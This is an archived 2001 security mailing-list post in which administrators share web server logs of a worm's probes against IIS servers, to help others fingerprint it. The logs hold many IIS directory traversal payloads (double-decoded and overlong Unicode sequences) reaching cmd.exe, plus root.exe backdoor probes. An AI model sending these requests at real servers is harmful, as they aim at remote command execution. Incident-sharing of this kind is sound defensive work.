I've gotten 721 hits just today for cmd.exe of some sort. We run apache so no worries, but this worm has hit faster than anything I've seen before. All from the people that share the same class A as us. This one must scan it's own class C then B then A first. (I know I'm probably abusing the terms, but you all know what I mean) 65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 On 2001.09.18 10:24 "Portnoy, Gary" wrote: > Greetings, > > I am suddenly seeing hundreds of Unicode traversal requests coming in > from > all over the world, many of them from previous CodeRed victims. I am > guessing someone changed CodeBlue to make it spread faster, because > before I > saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least > 20 > in the last hour. Just a a way to help fingerprint it, a few of the > attempted exploits use the multiple decode vulnerability.... > > -Gary- > > 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET > /scripts/root.exe?/c+dir > HTTP/1.0" 404 287 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET > /MSADC/root.exe?/c+dir > HTTP/1.0" 404 285 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" > "-" > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 326 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 326 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy > stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-" > 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" > "-" > 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" > "-" > 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" > "-" > 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" > "-" > 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" > "-" > 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" > "-" > 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 > "-" > "-" > 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" > "-" > > Gary Portnoy > Network Administrator > gportnoyat_private > > PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > -- Jason Giglio Information Technology Coordinator, Smyth Companies, Bedford VA Phone: 540-586-2311x113 e-mail: jgiglioat_private ----------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:45:20 PDT